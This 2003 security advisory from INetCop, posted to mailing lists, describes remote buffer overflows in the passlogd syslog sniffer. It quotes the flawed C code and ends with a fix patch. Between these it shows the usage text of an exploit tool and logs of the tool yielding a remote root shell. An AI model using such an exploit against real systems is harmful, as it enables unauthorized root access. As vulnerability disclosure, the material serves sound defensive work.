[VulnWatch] [INetCop Security Advisory] Remote Multiple Buffer Overflow vulnerability in passlogd sniffer.

From: dong-h0un U (xploit@hackermail.com)
Date: 04/02/03

  • Next message: zillion: "[VulnWatch] ChiTeX local root vulnerability"
    From: "dong-h0un U" <xploit@hackermail.com>
    To: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org
    Date: Thu, 03 Apr 2003 01:55:30 +0800
    
    

            ========================================
            INetCop Security Advisory #2003-0x82-015
            ========================================

    * Title: Remote Multiple Buffer Overflow vulnerability in passlogd sniffer.

    0x01. Description

    About:
    passlogd(passive syslog capture daemon) is a purpose-built sniffer for capturing
    syslog messages in transit. This allows for backup logging to be performed on
    a machine with no open ports.

    This program is introduced in securityfocus: http://www.securityfocus.com/tools/2076

    Vulnerability can presume as following.
    There is sl_parse() function to 33 lines of 'passlogd-0.1d/parse.c' code.

        __
        33 void sl_parse(char *user, struct pcap_pkthdr *pkthdr, u_char *pkt)
        34 {
            ...
        42 char level[5];
        43 char message[1024];
        44 char buffer[4096];
            ...
        77 while(pkt[i] != '>'){
        78 level[j] = pkt[i]; // First, buffer overflow happens.
        79 i++;
        80 j++;
        81 }
        82 i++;
            ...
        87 while(pkt[i] != '\n' && pkt[i] != '\r' && i < (pkthdr->caplen - 1)){
        88 if(debug)
        89 printf("at byte %d of %d\n", i, pkthdr->caplen - 1);
        90 message[z] = pkt[i]; // Second, buffer overflow happens.
        91 i++;
        92 z++;
        93 }
            ...
       103 /* built the logstring */
       104 if(dflag){
       105 sprintf(buffer, "%s %s\n", srcip, message); // Very dangerous.
       106 }
       107 else {
       108 sprintf(buffer, "%s to %s: <%s> %s\n", srcip, dstip, level, message) // Similarly, is dangerous.
    ;
       109 }
            ... /* Role of original is like this. */
       123 syslev = atoi(level);
       124 openlog("passlogd", 0, LOG_DAEMON);
       125 syslog(syslev, "%s", buffer);
        --

    Visual point that change flowing of this program, happen after overwrited stack variables.
    Of course, frame pointer overrun exists together.

    0x02. Vulnerable Packages

    Vendor site: http://www.morphine.com/src/passlogd.html

    passlogd v0.1d
    -passlogd-0.1d.tar.gz
    +FreeBSD
    +OpenBSD
    +Linux
    +Other
    passlogd v0.1c
    -passlogd-0.1c.tar.gz
    passlogd v0.1b
    -passlogd-0.1b.tar.gz
    passlogd v0.1a
    -passlogd-0.1a.tar.gz

    0x03. Exploit

    Our proof of concept code was completed.
    Exhibit it sooner or later.

    bash-2.04# ./0x82-Remote.passlogd_sniff.xpl

     passlogd sniffer remote buffer overflow root exploit
                                            by Xpl017Elz.

     Usage: ./0x82-Remote.passlogd_sniff.xpl -option [argument]

            -h - hostname.
            -f - spoof src ip.
            -s - &shellcode.
            -l - buf len.
            -t - target number.
            -i - help information.

     Select target number:

            {0} ALZZA Linux release 6.1 (Linux One)
            {1} WOW Linux release 6.2 (Puberty)
            {2} RedHat Linux release 7.0 (Guinness)
            {3} WOWLiNUX Release 7.1 (Paran)
            {4} RedHat Linux release 8.0 (Psyche)

     Example> ./0x82-Remote.passlogd_sniff.xpl -h localhost -f82.82.82.82 -t3
     Example2> ./0x82-Remote.passlogd_sniff.xpl -h localhost -s0x82828282 -l582

    bash-2.04#

    test exploit result: --

    #1) attacker system:

    bash-2.04# ./0x82-Remote.passlogd_sniff.xpl -h61.37.xxx.xx -t2 -s0x82828282

     passlogd sniffer remote buffer overflow root exploit
                                            by Xpl017Elz.

     [0] Set packet code size.
     [1] Set protocol header.
     [2] Make shellcode.
     [3] Set rawsock.
     [4] Send packet.
     [5] Trying 61.37.xxx.xx:36864.
     [-] Connect Failed.

    bash-2.04#

    #2) target system:

    [root@blah /passlogd-0.1d]# gdb -q ./passlogd
    (gdb) r
    Starting program: /passlogd-0.1d/./passlogd
    Wed Mar 26 12:16:27 2003
     
     
                                                                        to
     
     
     
     
     
     
                                                     : <
     
     
     
     
     
     
    >
     
                                               r^) F @ F @ F N f C F f ^ F )
        F f F N N N f ^ CC f V V fC ?) ?A ?A V v K
       /bin/shd
     
    Program received signal SIGSEGV, Segmentation fault.
    0x82828282 in ?? ()
    (gdb)

    real exploit result: --

    bash-2.04# ./0x82-Remote.passlogd_sniff.xpl -h61.37.xxx.xx -t2

     passlogd sniffer remote buffer overflow root exploit
                                            by Xpl017Elz.

     [0] Set packet code size.
     [1] Set protocol header.
     [2] Make shellcode.
     [3] Set rawsock.
     [4] Send packet.
     [5] Trying 61.37.xxx.xx:36864.
     [*] Connected to 61.37.xxx.xx:36864.
     [*] Executed shell successfully !

    Linux blah 2.4.20 #1 SMP Fri Mar 21 20:36:58 EST 2003 i686 unknown
    uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
    [root@blah /passlogd-0.1d]#

    --
    0x04. Patch
    === parse.patch ===
    --- parse.c	Sat Jun  9 14:07:45 2001
    +++ parse.patch.c	Wed Mar 26 11:48:33 2003
    @@ -75,6 +75,10 @@
       j=0;
       
       while(pkt[i] != '>'){
    +    if(j==sizeof(level)-1)
    +    {
    +	break;
    +    }
         level[j] = pkt[i];
         i++;
         j++;
    @@ -87,6 +91,10 @@
       while(pkt[i] != '\n' && pkt[i] != '\r' && i < (pkthdr->caplen - 1)){
     	if(debug)
     		printf("at byte %d of %d\n", i, pkthdr->caplen - 1);
    +    if(z==sizeof(message)-1)
    +    {
    +	break;
    +    }
         message[z] = pkt[i];
         i++;
         z++;
    @@ -102,10 +110,10 @@
     
       /* built the logstring */
       if(dflag){
    -    sprintf(buffer, "%s %s\n", srcip, message);
    +    snprintf(buffer, sizeof(buffer)-1, "%s %s\n", srcip, message);
       }
       else {
    -    sprintf(buffer, "%s to %s: <%s> %s\n", srcip, dstip, level, message);
    +    snprintf(buffer, sizeof(buffer)-1, "%s to %s: <%s> %s\n", srcip, dstip, level, message);
       }
     
       if(debug){
    === eof ===
    P.S: Sorry, for my poor english.
    --
    By "dong-houn yoU" (Xpl017Elz), in INetCop(c) Security.
    MSN & E-mail: szoahc(at)hotmail(dot)com,
                  xploit(at)hackermail(dot)com
    INetCop Security Home: http://www.inetcop.org (Korean hacking game)
                 My World: http://x82.i21c.net & http://x82.inetcop.org
    GPG public key: http://x82.inetcop.org/h0me/pr0file/x82.k3y
    --
    -- 
    _______________________________________________
    Get your free email from http://www.hackermail.com
    Powered by Outblaze
    

  • Next message: zillion: "[VulnWatch] ChiTeX local root vulnerability"

    Relevant Pages